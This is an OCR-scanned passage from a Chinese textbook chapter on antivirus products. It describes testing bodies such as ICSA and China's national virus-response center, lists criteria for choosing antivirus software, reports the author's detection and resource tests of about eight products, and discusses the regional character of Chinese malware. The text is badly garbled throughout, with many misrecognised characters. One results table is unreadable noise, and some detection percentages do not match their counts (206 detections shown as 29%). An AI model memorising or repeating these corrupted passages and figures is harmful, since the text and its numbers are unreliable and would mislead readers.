WLAN Security( 无 线 网 络 安全 ) 等 。 从 这 些 评测 项 目 可 以 看 出 ICSA 认证 对 象 以 保护 内 部 
网 络 的 安全 产品 为 主 。 

ICSA 每 个 月 都 会 做 出 一 次 防 病毒 的 认证 评测 ,并 将 评测 的 报告 公布 到 网 站 上 ,任何 人 
都 可 以 查阅 最 新 的 评测 报告 。 从 2004 年 至 今 的 所 有 评测 结果 也 都 可 以 在 该 网 站 上 查阅 。 
任何 一 款 安全 产品 都 是 以 通过 (Pass) 和 失败 (Fail) 来 标示 的 ,没有 其 他 级 别 。 


@ ICSA, 国 际 计 算 机 安全 协会 ,http://www. icsalabs. com。 
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11.2.7 中 国 反 病毒 软件 评测 机 构 


国家 计算 机 病毒 应 急 处 理 中 心中 是 经 公安 部 推荐 ,由 原 国 信 办 于 2001 年 批复 成 立 的 ， 
是 我 国 唯一 的 负责 计算 机 病毒 应 急 处 理 的 专门 机 构 , 主 要 职责 是 快速 发 现 和 处 置 计算 机 病 
毒 疫情 与 网 络 攻击 事件 ,保卫 我 国 计 算 机 网 络 与 重要 信息 系统 的 安全 。 承 担 国 务 院 各 部 委 
和 多 个 重要 政府 部 门 网 站 的 7X24 小 时 安全 监测 任务 ,并 拥有 国内 最 权威 的 恶意 代码 样本 
信息 库 , 目 前 共存 储 计算 机 病毒 样本 1600 万 余 个 。 

其 下 属 的 计算 机 病毒 防治 产品 检验 中 心 (下 称 检验 中 心 ) 成 立 于 1996 年 ,是 目前 我 国 计 
算 机 病毒 防治 领域 移动 安全 领域 和 APT 安全 监测 领域 唯一 获得 公安 部 批准 的 产品 检验 
机 构 。 

检验 中 心 负责 计算 机 病毒 防治 产品 移动 终端 病毒 防治 产品 、 移 动 终端 防火 墙 产品 \ 企 
业 移 动 终 端 安 全 管理 产品 .计算 机 主机 安全 检测 产品 、 防 病毒 网 关 、 网 络 病毒 监控 系统 
(VDS) .智能 移动 终端 未 成 年 人 保护 产品 ` 公 众 移动 终端 安全 管理 产品 .虚拟 化 安全 防护 产 
品 .高 级 可 持续 威胁 CAPT) 安 全 监测 产品 等 11 大 类 产品 申请 销售 许可 证 的 检测 ,并 定期 与 
不 定期 地 对 计算 机 防治 病毒 产品 质量 进行 抽查 。 截 至 目前 ,检验 中 心 已 对 200 余 个 厂商 
1000 多 个 产品 进行 了 测试 ,建成 了 下 一 代 高 性 能 网 络 设 备 测试 平台 ,满足 不 同 平 台 要 求 的 
单机 病毒 防治 产品 测试 平台 ,满足 不 同 企业 级 环境 要 求 的 网 络 病毒 防治 产品 测试 平台 ,满足 
网 关 产 品 、VDS 产品 的 网 络 测试 平台 ,以 及 APT 检测 产品 测试 平台 和 移动 安全 产品 的 测试 
平台 。 

计算 机 病毒 防治 产品 检验 和 认证 工作 是 一 个 新 的 检验 认证 领域 ,国家 和 行业 标准 体系 
尚 不 健全 。 近 年 来 ,检验 中 心 依托 多 年 技术 和 经 验 优 势 , 起 草 了 多 项 国家 标准 .行业 标准 和 
检验 规范 ,参与 编制 了 中 华人 民 共 和 国 社会 公共 安全 行业 标准 《计算 机 病毒 防治 产品 评级 准 
则 》GA243 一 2000)《 移 动 终端 病毒 防治 产品 评级 准则 认 GA849 一 2009) 等 。 


11.3 国内 外 著名 杀毒 软件 比较 


恶意 代码 在 给 人类 市 来 危害 的 同时 ,也 市 来 了 巨大 的 商机 。 于 是 ,很 多 企业 涉足 这 个 领 
域 并 开发 出 了 林林总总 的 恶意 代码 防范 产品 。 粗 略 统计 ,国内 知名 恶意 代码 防范 产品 的 品 
牌 有 十 多 家 ,全 世界 有 不 少 于 100 家 。 面 对 如 此 多 的 产品 ,一 般 用 户 将 做 出 什么 样 的 选择 ? 
为 了 对 抗 现 阶段 的 恶意 代码 ,恶意 代码 防范 产品 需要 具备 哪些 必要 的 功能 ? 


11.3.1 杀毒 软件 必 备 功能 


基于 安全 方面 的 考虑 ,每 一 个 计算 机 用 户 或 企业 信息 系统 管理 者 都 应 该 选择 一 球 正 版 
的 杀毒 软件 以 预防 各 种 类 型 的 恶意 破坏 。 使 用 盗版 杀毒 软件 帝 来 的 质量 和 服务 问题 都 会 像 
恶意 代码 一 样 危害 到 用 户 的 安全 。 一 些 安全 防范 知识 很 少 及 初学 计算 机 又 怕 被 恶意 代码 感 
染 的 用 户 在 花 钱 买 安全 时 ,如 何 选择 一 球 优 秀 的 杀毒 软件 成 了 摆 在 他 们 面前 的 首要 问题 。 


@@ 国家 计算 机 病毒 应 急 处 理 中心 ,http://www. cverc. org. cn/。 
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接 下 来 介绍 选择 杀毒 软件 时 应 注意 的 问题 。 

1. 查 杀 能 力 

这 项 功能 是 恶意 代码 防范 软件 最 原始 也 是 最 基本 的 能 力 , 是 考察 一 款 恶 意 代 码 防 范 
软件 是 否 优 秀 的 重要 指标 之 一 。 和 杀毒 必 先 识 毒 ,也 就 是 说 恶意 代码 防范 软件 必须 首先 能 
够 做 到 对 恶意 代码 的 有 效 检测 识别 。 传 统 的 反 病 毒 软件 以 恶意 代码 特征 码 匹 配 扫 摘 为 
基础 ,但 是 随 着 恶意 代码 技术 的 不 断 发 展 和 恶意 代码 数量 的 不 断 增加 ,简单 的 特征 码 匹 
配 慢 慢 变 为 文件 头 检 测 等 一 系列 比较 复杂 的 行为 特征 识别 机 制 。 为 了 对 付 变 形 恶意 代 
码 和 未 知 恶 意 代 码 ,要 求 恶 意 代 码 防 范 软件 具备 一 种 "月 我 发 现 的 能 力 ? 或 “运用 某 种 方 
式 或 方法 去 判定 事物 的 知识 和 能 力 ”, 恶 意 代 码 防 范 软件 采用 了 虚拟 机 等 新 技术 ,通过 虚 
拟 机 将 可 执行 文件 在 内 存 还 原 ,捕捉 其 执行 行为 特征 ,再 通过 恶意 代码 库 进 行 加 权 处 理 。 

恶意 代码 防范 软件 在 查 毒 误 报 率 方 面 的 准确 性 也 是 一 项 重要 指标 ,一 球 好 的 恶意 代码 
防范 软件 , 既 要 避免 漏 报 市 来 的 安全 隐患 ,也 要 避免 误 报 给 广大 用 户 珊 来 的 损失 。 当 发 生 误 
报时 ,恶意 代码 防范 软件 有 可 能 将 正常 文件 误 报 成 恶意 代码 ,也 可 能 将 一 种 新 出 现 的 恶意 代 
码 误 报 成 其 他 恶意 代码 ,或 者 将 一 些 恶 意 代码 误 报 成 多 种 恶意 代码 。 

男 外 ,恶意 代码 防范 软件 对 恶意 代码 的 清除 能 力 和 上 自 呈 的 防御 能 力也 是 其 基本 功能 。 

2. 防范 新 恶意 代码 的 能 力 

对 新 恶意 代码 的 发 现 和 处 理 是 否 及 时 ,是 考察 一 个 防 病毒 软件 好 坏 的 另 一 个 非常 重要 
的 因素 。 这 一 点 主要 由 3 个 因素 决定 : 软件 供应 商 的 恶意 代码 信息 收集 网 络 、 供 应 商 对 用 
户 发 现 的 新 恶意 代码 的 反应 周期 和 恶意 代码 的 更 新 周期 。 

通常 ,恶意 代码 防范 软件 供应 商都 会 在 全 国 其 至 全 世界 各 地 建立 一 个 恶意 代码 信息 的 
收集 分析 和 预测 网 络 ,使 其 软件 能 更 加 及 时 、 有 效 地 查 杀 新 出 现 的 恶意 代码 。 因 此 ,这 一 收 
集 网 络 在 一 定 程度 上 反映 了 软件 商 对 新 恶意 代码 的 反应 能 力 。 

3. 备份 和 恢复 能 力 

虽然 数据 恢复 和 数据 备份 在 某 种 程度 上 说 并 不 是 恶意 代码 防范 软件 的 主要 功能 ,但 是 
在 目前 恶意 代码 程序 越 来 越 狐 独 破坏 数据 资料 越 来 越 狠 毒 的 情况 下 ,一 球 好 的 杀毒 软件 应 
该 具备 足够 的 备份 数据 文件 和 恢复 数据 的 能 力 。 

4. 实时 监控 能 力 

按照 统计 ,邮件 系统 和 网 页 是 目前 最 常见 的 恶意 代码 传播 方式 。 这 些 传播 途径 具有 一 
定 的 实时 性 ,而 用 户 在 感 当 一段 时 间 后 还 无 法 察觉 。 因 此 ,恶意 代码 防范 软件 的 实时 监测 能 
力 就 显得 相当 重要 。 目 前 绝 大 多 数 恶 意 代 码 防 范 软 件 都 具有 实时 监控 功能 ,但 实时 监测 的 
言 息 范围 仍 值得 注意 。 

5. 升级 能 力 

在 网 络 世 界 里 ,新 恶意 代码 是 层出不穷 的 ,尤其 是 蠕虫 ,具有 相当 快 的 传播 速度 和 繁殖 
能 力 ,如 果 恶 意 代码 防范 软件 不 能 及 时 升级 应 对 , 短 时 间 内 就 可 能 会 造成 大 批 的 计算 机 被 恶 
意 代码 感染 ,所 以 恶意 代码 防范 软件 的 升级 能 力 是 非常 关键 的 。 而 且 这 种 升级 信息 也 需要 
和 安 半 一 样 能 方便 地 "分 发 ”到 各 个 终端 。 

各 个 恶意 代码 防范 软件 的 特征 码 更 新 周期 都 不 尽 相 同 , 有 的 一 周 更 新 一 次 ,有 的 半 个 月 
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更 新 一 次 。 对 用 户 发 现 的 新 恶意 代码 的 反应 周期 不 仅 能 够 体现 出 厂商 对 新 恶意 代码 的 反应 
速度 ,而 且 也 反映 了 厂商 对 新 恶意 代码 查 杀 的 技术 实力 


6. 智能 安装 能 力 


在 局 域 网 中 ,由 于 服务 器 、 客 户 端 承担 的 任务 不 同 ,对 恶意 代码 防范 软件 的 功能 要 求 也 
不 大 一 样 。 因 此 如 果 恶 意 代 码 防 范 软件 在 安 闻 时 能 够 上 月 动 区 分 服务 需 与 客户 端 , 并 进行 相 
应 的 安装 ,这 对 管理 员 来 说 将 是 一 件 十 分 方便 的 事情 。 远 程 安装 和 远程 设置 也 是 网 络 防 毒 
区 别 于 单机 防毒 的 一 个 关键 点 。 这 样 一 来 ,管理 员 在 进行 安装 .设置 的 工作 时 就 不 再 需要 来 
回 奔 波 于 各 台 终 端 , 从 繁重 的 工作 中 解放 出 来 , 既 可 以 对 全 网 的 机 器 进行 统一 安装 ,又 可 以 
有 针对 性 地 进行 设置 。 

7. 简单 易 用 

界面 操作 风格 应 该 注重 简单 易 用 、 美 观 大 方 。 

系统 的 可 管理 性 是 需要 管理 员 特 别 注意 的 部 分 。 管 理 员 应 该 从 系统 整体 角度 出 发 对 各 
人 台 计 算 机 进行 设置 。 如 果 人 允许 各 员工 随意 修改 自己 使 用 计算 机 上 的 防毒 软件 参数 ,可 能 会 
给 整个 安全 体系 带 来 一 些 意 想 不 到 的 漏洞 ,使 恶意 代码 乘虚 而 人。 

生成 恶意 代码 监控 报告 等 辅助 管理 措施 可 以 帮助 管理 者 随时 随地 了 解 局 域 网 内 各 台 计 
算 机 的 安全 情况 ,并 借 此 制订 或 调整 恶意 代码 防范 策略 ,这 将 有 助 于 恶意 代码 防范 软件 的 应 
用 更 加 得 心 应 手 。 

为 了 降低 用 户 企 业 的 管理 难度 ,有 些 恶 意 代码 防范 软件 采用 了 远程 管理 的 措施 ,一 些 企 
业 用 户 的 恶意 代码 防范 管理 由 专业 广 商 的 控制 中 心 专门 管理 。 

8. 资源 占用 情况 

恶意 代码 防范 程序 需要 占用 部 分 系统 资源 来 进行 实时 监控 ,这 就 不 可 避免 地 要 市 来 系 
统 性 能 的 降低 。 特 别 是 执行 对 邮件 、 网 页 和 FTP 文件 的 监控 扫描 任务 时 ,工作 量 相 当 大 ,所 
以 会 占用 较 多 的 系统 资源 。 有 些 用 户 会 感觉 上 网 速度 太 慢 ,这 在 某 种 程度 上 是 恶意 代码 防 
荡 程 序 对 网 页 执行 监控 扫描 带 来 的 影响 ，。 

男 一 种 是 升级 信息 的 交换 ,下 载 和 分 发 升级 信息 都 将 或 多 或 少 地 占用 网 络 带 宽 。 
但 多 数 产品 每 次 升级 信息 包 的 数据 不 过 几 兆 字 节 而 已 ,这 一 影响 比 起 其 他 方面 要 小 
得 多 。 

9. 兼容 性 

系统 兼容 性 并 不 仅仅 是 选 购 恶 意 代 码 防 范 软件 时 需要 考虑 的 ,在 采购 其 他 应 用 软件 时 
都 要 尽量 避免 与 恶意 代码 防范 软件 发 生 冲 突 。 亚 意 代 码 防 范 软件 的 一 部 分 常 驻 程序 如 果 与 
其 他 应 用 软件 不 兼容 ,将 带 来 很 大 的 问题 

10. 价格 


就 价格 来 说 ,企业 级 恶意 代码 防范 软件 初次 购买 和 后 继 的 升级 费用 大 多 是 按照 网 络 规 
模 来 确定 的 。 购 买 后 ,恶意 代码 防范 厂商 一 般 会 提供 一 定时 期 的 免费 升级 ,而 此 后 的 升级 及 
服务 如 何 收费 也 需要 做 到 心中 有 数 。 

对 不 同 的 用 户 来 讲 , 不 同 的 选 购 参数 应 该 有 不 同 的 权重 。 企 业 可 以 根据 具体 系统 的 情 
况 确 定 哪 一 因素 作为 购买 时 最 重要 的 参考 。 
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11. 厂商 的 实力 

软件 厂商 的 实力 表现 在 两 方面 : 一 方面 是 指 它 对 现 有 产品 的 技术 支持 和 服务 能 力 ; 另 
一 方面 是 指 它 的 后 续 发 展 能 力 。 因 为 企业 级 恶意 代码 防范 软件 实际 是 用 户 企业 与 厂商 的 长 
期 合作 ,软件 广 商 的 实力 将 会 影响 这 种 合作 的 持续 性 ,从 而 影响 到 用 户 企业 在 此 方面 的 投入 
成 本 。 


11.3.2 流行 杀毒 产品 比较 


恶意 代码 防范 产品 的 数量 越 来 越 多 ,用 户 也 越 来 越 难 以 决策 选择 何 种 产品 来 保护 自己 
的 个 人 计算 机 和 网 络 的 安全 。 和 针对 这 个 问题 ,有 很 多 权威 部 门 和 民间 组 织 发 布 过 一 些 测试 
报告 ,目的 是 指导 用 户 选 择 产 品 , 但 有 时 也 有 做 产品 宣传 的 嫌疑 。 在 此 ,作者 选择 部 分 产品 
进行 了 简单 测试 。 

测试 对 象 是 使 用 比较 普遍 的 几 球 杀毒 软件 ,如 Avast\Arvira( 小 红 伞 )、\AVG 金山 毒霸 、 
360 杀毒 .瑞星 杀毒 \ 卡 巴 斯 基 和 NOD32 等 。 

测试 所 采用 的 样本 病毒 主要 包括 感染 型 类 后 门类 和 木马 类 ,它们 均 为 2013 年 2 月 20 
日 到 3 月 27 日 新 增 的 样本 ,数量 约 为 600 个 。 由 于 测试 样本 来 自 网 络 搜集 ,不 排除 有 个 别 
其 他 类 别 的 病毒 样本 ,但 是 这 对 测试 结果 不 会 产生 很 大 影响 。 这 里 特别 感谢 kafan 论坛 、 
virussign. com 网 站 提供 的 病毒 样本 下 载 。 

1. 软件 空闲 资源 占用 测试 

此 项 测试 数据 来 自 于 正常 果 面 状态 ,无 各 类 程序 运行 或 文件 操作 ,测试 软件 也 未 进行 扫 
摘 或 更 新 等 行为 。 测 试 结 果 如 表 11-1 所 示 。 


表 11-1 空闲 时 资源 占用 情况 


序 号 安全 软件 名 称 空闲 时 占用 内 存 /MB 


金山 -新 毒霸“ 悟空 ASP1. 5 34 


co | -| 中 | 四 | 上 | 
> 
< 
AO 
J> 
妆 
加 二 
| 
< 
bt 
一 
nn 
co 
OO 


这 里 可 以 发 现 一 部 分 软件 的 内 存 资源 占用 在 30MB 以 下 ,而 男 一 部 分 却 在 100MB 以 
上 ,这 是 因为 后 者 一 般 具 有 对 非 运 行 的 文件 操作 (如 粘贴 .解压 缩 等 ) 的 实时 监控 功能 ,因此 
多 占 一 些 内 存 是 正常 的 。 

2. 扫描 资源 占用 测试 

此 项 测试 数据 来 自 于 使 用 测试 软件 进行 普通 的 全 盘 扫 描 状 态 。 此 项 数据 对 一 般 在 启动 
时 会 自动 进行 一 次 的 操作 也 适用 。 测 试 结果 如 表 11-2 所 示 。 
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表 11-2 扫描 时 资源 占用 情况 


序 号 安全 软件 名 称 CPU 占用 率 占用 内 存 /MB 
1 金山 -新 毒霸 "悟空 ”SP1. 5 10% 80 
卡巴 斯 基 反 病毒 软件 2013 22% 170 
3 ESET NOD32 Anti-Virus 7% 61 
4 诺顿 Anti-Virus 26% 210 
5 AVG Anti-Virus 15% 120 
6 AVAST 5% 40 
360 杀毒 8% 65 
8 瑞星 杀毒 软件 12% 100 

注 : 此 处 的 CPU 占用 率 是 整个 扫描 过 程 的 平均 占用 率 。 

3. 检 出 能 力 测试 


本 项 测试 针对 同一 份 病毒 样本 集 , 所 有 测试 软件 均 在 同一 天 进行 了 更 新 ,但 由 于 网 络 原 
因 及 可 能 出 现 的 免费 版 本 限制 等 ,不 同 测试 软件 的 病毒 数据 库 日 期 会 有 3 天 之 内 的 差别 。 
但 这 种 情况 和 实际 使 用 时 是 一 致 的 ,测试 结果 如 表 11-3 所 示 。 


表 11-3 检 出 能 力 测试 表 


序 号 安全 软件 名 称 检测 出 的 数量 检 出 率 

1 金山 -新 毒霸 “悟空 ”SP1. 5 528 87% 
2 卡巴 斯 基 反 病毒 软件 2013 598 99% 
3 ESET NOD32 Anti-Virus 585 97% 
4 AVG Anti-Virus 0 0 

个 诺顿 Anti-Virus 206 29% 
6 AVAST 541 81% 
了 360 杀毒 591 98% 
8 瑞星 杀毒 软件 591 98% 


注 : AVG 可 能 因为 是 免费 版 ,虽然 更 新 了 病毒 库 , 但 是 依然 无 法 检测 出 任何 一 个 病毒 样本 。 


4. 病毒 查 杀 性 能 测试 
本 项 测试 数据 为 上 一 项 测试 的 补充 ,给 出 了 查 杀 的 时 间 。 因 为 病毒 样本 均 放 在 同一 文 
件 夹 内 ,因此 这 里 补充 统计 的 是 查 杀 此 文件 夹 所 需 的 时 间 , 如 表 11-4 所 示 。 
表 11-4 查 杀 所 需 时 间 列 表 


序 号 安全 软件 名 称 查 杀 所 需 时 间 /s 
1 金山 -新 毒霸 “悟空 ”SP1.5 122 
2 卡巴 斯 基 安 全 部 队 2013 61 
本 ESET NOD32 Anti-Virus 220 
4 诺顿 Anti-Virus 87 
5 AVG Anti-Virus 10 
6 AVAST 14 
7 360 杀毒 27 
8 瑞星 杀毒 软件 239 
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11.3.3 恶意 代码 防范 产品 的 地 缘 性 


1. 产生 恶意 代码 地 缘 性 的 因素 


由 于 恶意 代码 的 传播 是 受 介 质 和 条 件 限 制 的 ,因此 在 不 同 的 历史 阶段 形成 了 不 同 的 地 
缘 性 特征 。 以 下 因素 是 产生 亚 意 代码 地 缘 性 的 主要 原因 。 

1) 编制 者 的 生活 空间 

最 早 的 恶意 代码 完全 依 徘 软 盘 介质 传播 ,传播 速度 比较 慢 , 除 了 一 些 大 批量 的 染 毒 介质 
可 能 造成 瞬间 的 大 面积 传播 外 ,一 般 恶意 代码 的 传播 以 恶意 代码 编制 者 初始 的 地 点 为 中 心 f 
缓慢 地 各 周围 扩散 。 

2) 特定 的 操作 系统 及 软件 环境 

通过 仔细 调查 后 会 发 现 ,如 果 FreeBSD 系统 在 某 地 比较 流行 , 则 某 地 最 可 能 流传 BSD 
系统 的 蠕虫 ; 中 国 大 陆 的 Windows 系统 普及 率 最 高 ,那么 基于 Windows 系统 的 恶意 代码 
也 就 最 多 。 这 是 因为 ,恶意 代码 奋 要 获得 比较 踢 的 生命 力 , 造 成 大 规模 传播 ,只 有 选择 寄生 
于 主流 操作 系统 。 由 于 不 同 地域 人 和 群 可 能 会 对 系统 环境 有 不 同 的 选择 ,因此 恶意 代码 编制 
者 会 据 此 做 出 不 同 的 考虑 。 除 了 操作 系统 外 ,一 些 可 能 传播 恶意 代码 的 软件 环境 也 是 恶意 
代码 地 缘 性 的 原因 之 一 。 例 如 , 宏 病毒 .irc. worm 、p2p. a 等 特殊 环境 的 蠕虫 ， 
都 依赖 于 特定 的 软件 环境 甚至 软件 的 版 本 。 

3) 定 癌 性 攻击 和 条 件 传播 

在 传统 病毒 之 后 发 展 出 一 种 称 为 “网 络 蠕虫 ”的 新 型 恶意 代码 , 它 在 攻击 和 传播 上 有 别 
于 传统 病毒 , 它 可 以 根据 IP 地 址 范围 做 定 问 性 的 扫描 ,同时 还 可 以 根据 运行 操作 系统 的 语 
言 或 其 他 特性 判别 是 否 感染 。 网 络 晴 虫 的 这 种 定 回 性 攻击 和 条 件 传播 改变 了 传统 病毒 以 扩 
散 点 为 中 心 的 特性 。 

2. 地 缘 性 对 恶意 代码 防范 产品 的 影响 

恶意 代码 产生 之 初 ,是 以 磁盘 为 主要 介质 的 ,因而 传播 速度 比较 慢 。 由 于 政策 性 和 其 他 
因 系 ,国内 反 病 毒 产 品 和 国外 没有 实际 的 竞争 。 随 看 攻防 双方 技术 的 发 展 ,DOS 时 代 的 几 
个 病毒 家 族 在 中 国 本 土 的 制造 技术 逐渐 成 熟 , 而 且 都 比较 完整 地 综合 了 一 些 新 的 技术 手段 。 
纵 观 DOS 时 代 , 与 中 国 大 陆 具 有 亲缘 关系 的 病毒 ,总数 比 较 少 ,基本 没有 出 现 几 十 乃至 上 百 
种 变种 的 庞大 家 族 。 这 些 国 产 病毒 的 陆续 出 现 ,客观 上 增加 了 用 户 对 国内 产品 的 信任 。 当 
时 ,除了 CPAYV 外 ,国内 用 户 对 国外 产品 缺乏 了 解 , 虽 然 有 盗版 光盘 流 和 人 ,但 由 于 难以 升级 ， 
因此 也 很 少 使 用 。 同 时 ,当时 多 数 国外 产品 在 国内 确实 没有 代理 机 构 , 也 并 没有 样本 采集 网 
络 , 对 国内 样本 的 搜集 也 比较 迟钝 。 因 此 ,当时 国内 的 几 个 主要 的 反 病 毒 产品 确实 占 了 绝对 
优势 。 

这 种 状况 在 宏 病 毒 出 现 后 发 生 了 骤然 变化 。 安 病毒 采用 类 BASIC 语言 ,编写 非常 容 
易 , 加 上 Macro. Word. Concept 病毒 的 源码 迅速 被 公开 , 宏 病毒 数量 瞬间 呈 级 数 增长 。 中 国 

台湾 是 亚太 地 区 的 一 个 重要 的 病毒 生产 基地 。 当 时 有 很 多 宏 病 毒 在 台湾 地 区 先 流行 起 来 ， 

闯关 这 扩大 天 精 : 其 中 ,非常 有 代表 性 的 是 台湾 1 号 宏 病 毒 家 族 ,传播 范围 非常 广 , 变 种 也 
很 多 。 

由 于 微软 未 公开 Office 文档 的 二 进 制 结构 ,当时 国内 几 家 恶意 代码 防范 企业 与 微软 的 
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相关 谈判 都 以 失败 告终 ,因此 国内 厂家 只 能 用 各 种 比较 粗糙 的 办 法 来 争取 时 间 ,力求 通过 逆 
癌 工 程 破解 Office 文档 的 二 进 制 结构 。 有 些 厂家 不 得 不 暂时 使 用 “以 宏 杀 宏 ” 的 临时 措施 ， 
有 些 则 采用 简单 地 搜索 宏 指 令 的 位 置 ,然后 将 其 后 20 个 字 节 清 零 以 使 宏 病 毒 失效 的 方法 。 
而 形成 对 比 的 是 当时 国外 一 些 企业 (如 McAfee 等 ) 很 容易 地 从 微软 取得 了 Office 文档 结 
构 。 应 该 说 ,这 种 企业 的 “地 缘 性 ?差异 ,让 中 国 恶意 代码 防范 企业 在 目 己 的 家 门口 第 一 次 感 
受到 了 压力 。 

微软 系统 从 16 位 平台 向 32 位 平台 跨越 的 过 程 中 ,系统 内 核 也 随 之 发 生 了 很 大 的 变化 ， 
文件 结构 经 历 了 MZ、NE .PE 的 过 渡 ,而 系统 的 权限 结构 也 逐渐 严格 。 这 使 得 大 量 DOS 病 
毒 失去 传播 能 力 , 同 时 也 给 了 国内 广 商 在 查 杀 流行 病毒 方面 重新 和 国外 企业 站 到 一 个 起 跑 
线 上 的 机 会 。 

由 于 编制 Win32 平台 病毒 需要 编制 者 对 Win32 系统 的 结构 和 PE 文件 结构 做 比较 深 
入 的 分 析 , 在 Windows 时 代 的 前 期 ,病毒 出 现 的 节奏 开始 减 慢 。 而 Win32 系统 所 提供 的 多 
进程 多 任务 的 特性 ,使 恶意 代码 防范 产品 真正 实现 了 实时 监控 技术 。 此 时 ,境外 主流 商用 
产品 开始 全 面 咎 企业 级 解决 方案 过 渡 。 来 日 台湾 地 区 的 CIH ,是 一 个 标志 性 的 PE 病毒 。 

由 于 网 络 在 这 个 阶段 开始 普及 ,国外 恶意 代码 防范 软件 厂商 开始 进入 国内 市 场 并 获得 
用 户 认 可 , 相 较 从 前 也 更 容易 获取 国内 恶意 代码 样本 ,因此 在 对 国内 恶意 代码 的 啊 应 速度 
上 ,基本 能 做 到 与 国内 恶意 代码 防范 软件 同步 。 与 此 同时 ,国内 厂商 也 逐渐 积累 了 足够 的 实 
力 , 可 以 对 流入 国内 的 境外 恶意 代码 做 出 迅速 啊 应 。 因 此 虽然 在 查 杀 恶意 代码 总 数 上 与 国 
外 软件 相 比 ,国内 主流 软件 有 一 定 优势 ,但 在 中 国内 地 这 个 特定 的 区 域内 ,双方 基本 持平 ,都 
没有 明显 差距 。 当 时 ,专家 们 也 曾经 认为 ,在 Internet 的 普及 、 样 本 交换 等 诸多 因 系 的 影响 
下 ,地 绿 性 问题 已 经 基本 消亡 。 但 随即 发 生 的 变化 , 则 回 另 一 个 方 加 发展, 使 地 绿 性 成 为 对 
国外 主流 产品 的 新 挑战 。 

3. 地 缘 性 对 国外 主流 产品 的 新 挑战 

目前 ,中国 新 恶意 代码 的 地 缘 性 表现 在 以 下 几 点 。 

1) 中 国 已 经 成 为 全 球 恶 意 代码 扩散 的 中 心 节点 之 一 

Worm. Solaris. Sadmind 是 第 一 个 造成 较 大 影响 的 国产 蠕虫 , 它 基 于 Solaris 系统 传播 ， 
可 以 多 线程 扫描 IP, 如 果 发 现 远 端 是 NT 系统 ,并 具有 IIS 漏洞 ,就 修改 Web 页 面 。 其 后 国 
产 典 型 蠕虫 大 量 涌 现 , 如 IIS-Worm. BlueCode IIS-Worm. CodeRed IIS-Worm. CodeGreen， 
直到 类 似 -Worm. Nimda 长 时 间 肆 上 钳 的 是 虫 ,这 些 晴 虫 都 有 一 定 的 技术 特点 ,与 造成 微软 
源码 失 禄 的 Worm. Qaz 一 样 ,都 被 怀疑 出 月 国人 之 手 。 这 个 阶段 的 晴 虫 ,在 编制 技术 上 表 
现 出 一 些 创 新 点 ,而 不 像 最 早 的 国内 恶意 代码 ,只 是 修改 显示 特性 或 感染 标记 ,好 一 点 的 也 
只 是 综合 了 国外 恶意 代码 的 技术 经 验 , 这 些 恶 意 代码 体现 出 网 络 安全 问题 和 主机 安全 问题 
的 融合 性 ,同时 也 告诉 人 们 ,中 国正 在 成 为 全 球 恶意 代码 扩散 的 中 心 节点 之 一 。 

2) 木马 大 量 出 现 

国产 木马 程序 开始 爆发 式 增长 ,这 一 时 期 比较 有 代表 性 的 木马 程序 有 冰河 、 广 外 女生 、 
网 络 神偷 等 。 当 时 ,国外 的 主流 木马 基本 是 开放 式 架 构 , 可 扩展 插件 ,甚至 提供 路 平台 特性 ， 
逐步 癌 协 作 方 向 发 展 , 如 BO2K、SubSeven 等 一 些 典型 木马 。 与 之 相 比 , 国 内 木马 表现 出 完 
全 不 同 的 走势 ,技术 上 侧重 于 对 恶意 代码 防范 产品 的 对 抗 。 虽 人 然 国内 木马 有 一 些小 的 、 比 较 
突出 的 技术 构想 ,但 从 整个 技术 含量 上 已 经 落后 于 国外 。 可 是 国内 木马 的 种 类 和 小 版 本 更 
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新 的 速度 更 令 人 上 脱 目 结 舌 。 

3) 针对 国内 网 络 工具 的 专用 木马 大 量 出 现 

当前 ,由 于 利益 的 驱使 ,相当 数量 的 国产 木马 程序 都 以 锚 取 网 络 游 戏 相 关 信 息 为 目的 。 
例如 ,国内 的 QQ 和 边锋 、 联 众 .传奇 等 网 络 游戏 就 颇 受 国产 木马 的 青睐 ,而 这 些 应 用 产品 在 
欧美 基本 没有 用 户 ,因此 ,这 些 样 本 往往 得 不 到 一 些 国际 主流 安全 企业 的 重视 。 

以 上 几 点 基本 构成 了 当今 中 国 新 的 恶意 代码 地 缘 性 特色 。 这 种 特色 不 仅 给 国外 在 中 国 
的 主流 反 恶 意 代 码 产品 构成 了 严峻 的 挑战 ,也 给 中 国 本 土产 品 带 来 了 很 大 的 挑战 。 

4. 国外 主流 产品 的 本 土 化 改造 

由 于 恶意 代码 的 地 缘 特 性 ,使 反 恶 意 代码 产品 的 本 土 化 与 其 他 软件 产品 的 “本 土 化 就 是 
汉化 ”的 概念 完全 不 同 。 国 外 主流 产品 虽然 在 查 杀 恶意 代码 总 数 积累 ,全 球 恶 意 代码 采集 网 
络 .引擎 和 产品 结构 ,企业 级 反 恶 意 代码 模式 等 方面 优 于 国内 产品 ,但 也 必须 解决 好 如 下 问 
题 : 如 何 有 效 地 对 抗 本 土 恶意 代码 的 新 技术 点 ; 如 何 更 迅速 地 采集 并 啊 应 本 土 恶 意 代 码 样 
本 ; 如 何 使 产品 和 逐步 符合 中 国 用 户 的 习惯 ; 如 何 推广 企业 级 的 反 恶 意 代码 思路 ; 如 何 让 国 
内 用 户 认 识 到 国际 产品 的 技术 优势 。 

为 了 解决 本 土 化 问题 ,国外 恶意 代码 防范 企业 基本 上 走 了 如 下 几 条 道路 。 

(1) 在 中 国 建立 分 文 机 构 ,不 设立 研发 部 门 ,通过 用 户 渠 道 解 决 相关 问题 。 这 种 方式 成 
本 低 ,但 是 在 很 多 方面 都 受到 一 定 限制 。 

(2) 在 国内 建立 独立 研发 中 心 , 完 成 汉化 和 本 土 恶意 代码 处 理 。 这 种 方式 效果 好 ,但 是 
成 本 比较 高 。 

(3) 与 国内 反 恶 意 代 码 企业 合资 ,使 国内 现 有 品牌 结合 国外 先进 的 引擎 ,利用 原 有 企业 
力量 完成 汉化 和 本 土 恶 意 代 码 处 理 。 这 种 方式 需要 一 定 的 机 遇 。 

(4) 与 国内 反 恶 意 代 码 企 业 进 行 合 作 , 伟 助 各 上 自 优 势 进行 产品 推广 。 这 种 方式 较为 灵 
活 ,基于 利益 的 绑 定 使 得 双方 各 有 所 得 。 

例如 ,知名 厂商 卡巴 斯 基 2003 年 进入 中 国 市 场 后 ,最 初 反 啊 平平 。2006 年 年 中 卡巴 斯 
基 开 始 与 奇 虎 360 合作 ,用户 安装 360 安全 卫士 可 以 免费 获 赠 卡 巴 斯 基 杀毒 软件 ,双方 借助 
